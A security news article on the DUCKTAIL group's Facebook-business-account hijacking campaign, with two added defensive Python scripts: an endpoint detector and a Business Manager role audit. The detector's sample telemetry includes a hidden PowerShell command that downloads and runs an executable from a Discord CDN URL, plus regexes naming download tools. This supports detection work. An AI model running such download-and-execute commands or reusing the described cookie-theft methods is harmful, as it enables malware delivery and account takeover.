A group of attackers, possibly based in Vietnam, who specialize in targeting employees with potential access to Facebook corporate and ad management accounts, has resurfaced with changes to its infrastructure, malware and modus operandi after initially being discovered a few months ago.
Dubbed DUCKTAIL by WithSecure researchers, the group uses spear phishing to target people on LinkedIn who have job descriptions that might suggest they have access to managing Facebook business accounts. More recently, attackers have also been observed targeting victims via WhatsApp. Compromised Facebook business accounts are used to post ads on the platform for the attackers’ financial gain.
DUCKTAIL attackers do their research
Account abuse is carried out through the victim’s own browser session, using a malware program delivered in the guise of brand, product and project-planning documents. The attackers first compile a list of companies that have company pages on Facebook. They then look for employees on LinkedIn and other sources who work for those companies and hold job titles likely to come with access to those pages: managerial, digital marketing, digital media and HR roles.
The final step is to send the target a link to an archive containing the malware disguised as a .pdf, bundled with images and videos that appear to belong to the same project. Filenames seen by the researchers include project “development plan”, “project information”, “products” and “new L’Oréal budget business plan”. Some of the filenames contained country names, which suggests the attackers tailor the lure to each victim’s company and country based on their reconnaissance. The identified victims were scattered all over the world, so the group does not appear to target any particular region.
The DUCKTAIL Group is believed to have been running this campaign since the second half of 2021. After WithSecure exposed their operation in August this year, the operation stopped and the attackers reworked some of their toolsets.
Attackers switch to GlobalSign as the certificate authority
The malware samples analyzed earlier this year were digitally signed with a legitimate code signing certificate issued by Sectigo to a Vietnamese company. After that certificate was reported and revoked, the attackers switched to GlobalSign as their certificate authority. While continuing to request certificates from multiple CAs in the original company’s name, they also registered six other businesses, all Vietnamese, and obtained code signing certificates for three of them. Code signing certificates, and extended validation (EV) certificates in particular, require the applicant’s identity to be verified against documentation, so the actor is willing to go through identity vetting for companies it controls rather than relying on a single certificate.
“At the time of this writing, the threat actor has adapted to certificate revocations using timestamping as a method of countersigning via DigiCert,” WithSecure researchers said in a new report released this week. A timestamp countersignature records that the file was signed while the certificate was still valid, so Windows Authenticode validation can continue to accept the signature after the certificate expires or is revoked, as long as the revocation is dated after the timestamp; defenders should therefore not rely on revocation alone to block these samples.
The DUCKTAIL malware samples seen in late 2021 were written in .NET Core and were compiled using the framework’s single-file feature, which bundles all required libraries and files into a single executable file, including the main assembly. This ensures that the malware can run on any Windows computer whether or not the .NET runtime is installed. Since August 2022, when the campaign stopped, WithSecure researchers have observed multiple development DUCKTAIL samples uploaded to VirusTotal from Vietnam.
One of the samples was built with .NET 7’s NativeAOT, which provides functionality similar to the single-file feature of .NET Core but compiles the program ahead of time into a native binary. However, NativeAOT has limited support for third-party libraries, so the attackers reverted to .NET Core.
Bad actors have experimented
Other experiments were also observed, such as adding anti-analysis code taken from a GitHub project (a change that never made it into a live sample), fetching the list of attacker email addresses as a .txt file from the command-and-control server instead of hardcoding them in the malware, and opening a decoy file when the malware runs to make the victim less suspicious: decoy documents (.docx), spreadsheets (.xlsx) and videos (.mp4) have all been seen.
The attackers are also testing multi-stage loaders to deliver the malware, such as an Excel add-in file (.xll) that extracts a secondary loader from an encrypted blob, which then downloads the infostealer. The researchers also identified a downloader written in .NET that they attribute to DUCKTAIL with high confidence; it runs a PowerShell command that downloads the infostealer from Discord.
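The loader chain above (an .xll opened from a user-writable path, then Excel spawning PowerShell that pulls a payload from Discord’s CDN) is the kind of behaviour endpoint telemetry can catch even when the final binary is freshly signed. The following is an added example of that detection logic, not code from WithSecure or from any DUCKTAIL sample; the events are constructed to resemble Sysmon process-creation fields, and the field names, paths and rule thresholds are assumptions for illustration.

```python
"""Process-creation heuristics for a DUCKTAIL-style .xll -> PowerShell -> Discord chain.

Added example (not WithSecure's or the malware author's code). Event dicts
mimic Sysmon Event ID 1 fields; names and values are assumed/constructed.
"""
import re

# Constructed sample telemetry, not real captures.
SAMPLE_EVENTS = [
    {   # benign: user opens a spreadsheet
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r'"EXCEL.EXE" "C:\Users\a\Documents\budget.xlsx"',
    },
    {   # suspicious: Excel opening an add-in from the Downloads folder
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r'"EXCEL.EXE" "C:\Users\a\Downloads\project information.xll"',
    },
    {   # malicious: Excel spawns PowerShell that downloads and runs a payload from Discord's CDN
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -nop -w hidden -c "Invoke-WebRequest -Uri '
                       'https://cdn.discordapp.com/attachments/1/2/x.exe -OutFile '
                       '$env:TEMP\\x.exe; Start-Process $env:TEMP\\x.exe"',
    },
    {   # benign: an administrator running PowerShell from a console; must not fire
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Get-Process",
    },
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Common PowerShell download cradles (partial list, assumed for illustration).
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|iwr\b|downloadfile|downloadstring|start-bitstransfer|curl\b|wget\b)",
    re.IGNORECASE,
)
DISCORD_CDN = re.compile(r"https?://(cdn\.discordapp\.com|media\.discordapp\.net)/", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData)\\", re.IGNORECASE)
XLL_ARG = re.compile(r"\.xll\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule matched by one process-creation event."""
    hits = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    # Stage 1: Excel loading an .xll add-in from a user-writable location.
    if image == "excel.exe" and XLL_ARG.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("excel_xll_from_user_path")
    # Stage 2/3: an Office process spawning a shell, with download cradle and Discord CDN as escalators.
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("shell_download_cradle")
        if DISCORD_CDN.search(cmd):
            hits.append("discord_cdn_payload")
    return hits


def scan(events):
    """Return (index, matched rules) for every event that matched at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, ", ".join(rules))
```

The Office-spawns-shell rule is deliberately kept separate from the download-cradle and Discord rules so that a single benign macro launching `cmd.exe` scores low while the full chain stacks three matches; tune the parent/child sets and the path regex to the software actually deployed in the environment.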
The infostealer uses Telegram channels for command and control. The attackers have locked these channels down more tightly since they were deactivated in August, and some channels now have multiple administrators, which could suggest the group is running an affiliate program similar to those of ransomware gangs. “This is further enhanced by the increase in chat activity and the new file encryption mechanism which ensures that only certain users will be able to decrypt certain exfiltrated files,” the researchers say.
Once executed, the DUCKTAIL malware enumerates the browsers installed on the system and the location of each browser’s cookie store. It then steals all stored cookies, including any Facebook session cookies among them. A session cookie is a small identifier a website sets in the browser after successful authentication so that the user stays logged in for a period of time; whoever holds a valid session cookie can present it to the site and be treated as that logged-in user, without needing the password or a second factor.
The malware uses the Facebook session cookie to interact directly with Facebook pages or to query the Facebook Graph API for information. For personal accounts this includes name, email, date of birth and user ID; for Facebook business pages reachable from those personal accounts, the name, verification status, ad limit, users and pending users; and for any associated Facebook Ads accounts, the name, ID, account status, ad payment cycle, currency, adtrust DSL and amount spent.
The malware also checks if two-factor authentication is enabled for compromised accounts and uses the active session to obtain backup codes for two-factor authentication when enabled. “Information stolen from the victim’s machine also allows the threat actor to attempt these activities (as well as other malicious activities) from outside the victim’s machine,” the researchers said. “Information such as stolen session cookies, access tokens, 2FA codes, user agents, IP address and geolocation, as well as general account information (such as name and date of birth) could be used to cloak and impersonate the victim.”
The malware then attempts to add attacker-controlled email addresses to hijacked Facebook business accounts with the most powerful roles available: Admin and Finance editor. According to Meta’s documentation, admins have full control over the account, while finance editors control the credit card information stored in the account as well as its transactions, bills and spending. Finance editors can also give external businesses access to the stored credit cards and monthly invoicing by allowing those businesses to use the same payment method.
Impersonate identities of legitimate account managers
“In cases where the targeted victims did not have sufficient access for the malware to add the threat actor’s email addresses to their intended corporate accounts, the threat actor relied on information exfiltrated from computers and victims’ Facebook accounts to impersonate them and achieve their post-compromise goals through hands-on activities,” the researchers said in their new report.
In one case investigated by WithSecure’s incident responders, the victim used an Apple computer and had never logged into Facebook from a Windows machine. No malware was found on the system and the initial access vector could not be determined. Whether this case was related to DUCKTAIL is unclear, but the researchers determined that the attackers were also operating from Vietnam.
Facebook Business admins are advised to regularly review the users listed under Business Manager > Settings > People and remove any unknown user who has been granted the Admin or Finance editor role, since these are exactly the roles the malware tries to assign to attacker-controlled addresses.
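As an added example of turning that review into a repeatable check (not Meta’s code and not part of the WithSecure report), the function below reconciles a Business Manager user list against an allowlist of people who are supposed to hold privileged roles. The input mimics the JSON shape of a Graph API `business_users` listing as an assumption; the field names `role`, `email` and `pending`, the role strings, and the sample users are all assumed or constructed for illustration and should be checked against current Meta documentation before use.

```python
"""Audit Business Manager users for unexpected Admin / Finance editor roles.

Added example, not Meta's or WithSecure's code. Field names, role strings
and the free-mail domain list are assumptions; the sample data is constructed.
"""

# Roles the DUCKTAIL malware tries to obtain (role strings assumed).
PRIVILEGED_ROLES = {"ADMIN", "FINANCE_EDITOR"}
# Partial list of consumer mail domains; a privileged user on one of these
# deserves a second look in a corporate Business Manager.
FREEMAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}

# Constructed sample in an assumed Graph-API-like shape.
SAMPLE_RESPONSE = {
    "data": [
        {"id": "1", "name": "Alice Admin", "email": "alice@example.com", "role": "ADMIN"},
        {"id": "2", "name": "Bob Marketer", "email": "bob@example.com", "role": "EMPLOYEE"},
        {"id": "3", "name": "Unknown Person", "email": "owner-7f@outlook.com", "role": "ADMIN"},
        {"id": "4", "name": "Pending Finance", "email": "fin-x@hotmail.com",
         "role": "FINANCE_EDITOR", "pending": True},
    ]
}
APPROVED_PRIVILEGED = {"alice@example.com"}


def audit_business_users(response, approved_privileged):
    """Return privileged users whose e-mail is not on the allowlist, with risk flags.

    Pending invitations are included on purpose: an attacker-added address that
    has not yet accepted still shows up as a pending user and should be removed.
    """
    findings = []
    for user in response.get("data", []):
        role = (user.get("role") or "").upper()
        if role not in PRIVILEGED_ROLES:
            continue
        email = (user.get("email") or "").lower()
        if email in approved_privileged:
            continue
        flags = [f"unapproved_{role.lower()}"]
        if user.get("pending"):
            flags.append("pending_invite")
        domain = email.rsplit("@", 1)[-1]
        if domain in FREEMAIL_DOMAINS:
            flags.append("personal_email_domain")
        findings.append({"id": user.get("id"), "email": email, "role": role, "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in audit_business_users(SAMPLE_RESPONSE, APPROVED_PRIVILEGED):
        print(finding["email"], finding["role"], ", ".join(finding["flags"]))
```

Run it against a freshly fetched user list on a schedule and alert on any finding; the allowlist should be short and maintained outside Business Manager, since an attacker with the Admin role can edit the people list itself.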
“Through our investigations, the WithSecure Incident Response team discovered that the business history logs and Facebook data of the targeted individuals were relevant to the incident analysis,” the researchers said. “However, for logs relating to an individual’s Facebook account, there are wide inconsistencies between what is visible on the web portal versus what one would get by downloading a copy of their data. As a recommendation to other investigators, the WithSecure Incident Response team strongly recommends that you acquire a local copy of your business history logs as soon as possible and request a copy of your user data for your account.”